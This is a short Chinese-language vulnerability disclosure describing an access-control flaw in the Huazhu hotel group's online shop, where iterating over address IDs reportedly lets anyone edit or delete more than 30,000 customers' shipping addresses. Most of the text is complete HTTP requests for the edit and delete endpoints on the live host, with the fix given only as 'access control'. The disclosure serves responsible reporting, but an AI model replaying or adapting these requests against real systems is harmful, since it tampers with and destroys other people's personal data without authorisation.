漏洞细节
商城收货地址越权修改与删除,遍历地址id就可越权操作,目前是3万多地址
https://hmall.huazhu.com/member_addressList.html
修改:
POST /api/shop/memberAddress!edit.do?addr_id=37860 HTTP/1.1
Host: hmall.huazhu.com
Connection: keep-alive
Content-Length: 266
Accept: application/json
Origin: https://hmall.huazhu.com
X-Requested-With: XMLHttpRequest
memberAddres.name=%E9%99%88%E7%94%9F&memberAddres.mobile=13503401234®ion=%E5%BE%90%E6%B1%87%E5%8C%BA&city=%E5%BE%90%E6%B1%87%E5%8C%BA&province=%E4%B8%8A%E6%B5%B7&province_id=2&city_id=54®ion_id=472&memberAddres.addr=1212&memberAddres.addr_id=37860删除:
GET /api/shop/memberAddress!delete.do?addr_id=37860 HTTP/1.1
Host: hmall.huazhu.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:
修复建议:
权限控制
参见:https://bugs.shuimugan.com/bug/view?bug_no=212974
2335
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
